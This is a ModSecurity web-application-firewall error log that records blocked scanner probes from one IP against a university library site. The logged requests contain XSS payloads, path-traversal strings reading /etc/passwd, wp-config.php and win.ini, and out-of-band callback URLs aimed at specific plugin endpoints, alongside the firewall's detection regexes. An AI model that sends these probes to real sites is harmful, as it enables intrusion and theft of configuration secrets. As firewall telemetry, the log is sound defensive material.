[Tue Aug 29 11:54:31.663780 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAApZHWEAAAAf"]
[Tue Aug 29 11:54:32.668605 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqeFOgAAAAx"]
[Tue Aug 29 11:54:33.561685 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqRzCcAAAAM"]
[Tue Aug 29 11:54:34.548477 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAAqWwWgAAAAl"]
[Tue Aug 29 11:54:34.603339 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAo2nBwAAAAA"]
[Tue Aug 29 11:54:35.713088 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAApa-FEAAAAg"]
[Tue Aug 29 11:54:35.724355 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAo2nB8AAAAA"]
[Tue Aug 29 11:54:37.844605 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DcCo-f0AAAqWwW4AAAAl"]
[Tue Aug 29 11:54:38.666242 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAAph8xwAAAAj"]
[Tue Aug 29 11:54:40.528715 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAo2nCkAAAAA"]
[Tue Aug 29 11:54:41.603827 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAApa-FoAAAAg"]
[Tue Aug 29 11:54:41.631233 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibft.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAApV24IAAAAJ"]
[Tue Aug 29 11:54:44.600314 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqSwkgAAAAN"]
[Tue Aug 29 11:54:46.591058 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAolKjsAAAAe"]
[Tue Aug 29 11:54:47.614541 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAqWwZAAAAAl"]
[Tue Aug 29 11:54:50.537519 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAqTvlgAAAAa"]
[Tue Aug 29 11:54:50.584369 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAApHRZUAAAAP"]
[Tue Aug 29 11:54:50.654718 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16GsCo-f0AAAqdbowAAAAw"]
[Tue Aug 29 11:54:51.565343 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16G8Co-f0AAAqTvl8AAAAa"]
[Tue Aug 29 11:54:52.600765 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAqUB54AAAAb"]
[Tue Aug 29 11:54:54.044566 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAqRzFcAAAAM"]
[Tue Aug 29 11:54:55.746537 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb048i5t73jwy777.oast.site found within TX:1: cjmnijtjmimvgniikdb048i5t73jwy777.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAAqY59AAAAAr"]
[Tue Aug 29 11:54:55.802255 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqhN-4AAAAE"]
[Tue Aug 29 11:54:56.727799 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAApXgiwAAAAU"]
[Tue Aug 29 11:54:58.215427 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAApk-acAAAAn"]
[Tue Aug 29 11:54:58.215483 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAApk-acAAAAn"]
[Tue Aug 29 11:54:58.243740 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAqRzGwAAAAM"]
[Tue Aug 29 11:54:59.580777 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAqY598AAAAr"]
[Tue Aug 29 11:54:59.711849 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqhOBYAAAAE"]
[Tue Aug 29 11:55:02.846623 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAoAk@QAAAAC"]
[Tue Aug 29 11:55:04.222922 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAqhOCwAAAAE"]
[Tue Aug 29 11:55:04.528300 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAqsV1QAAAAB"]
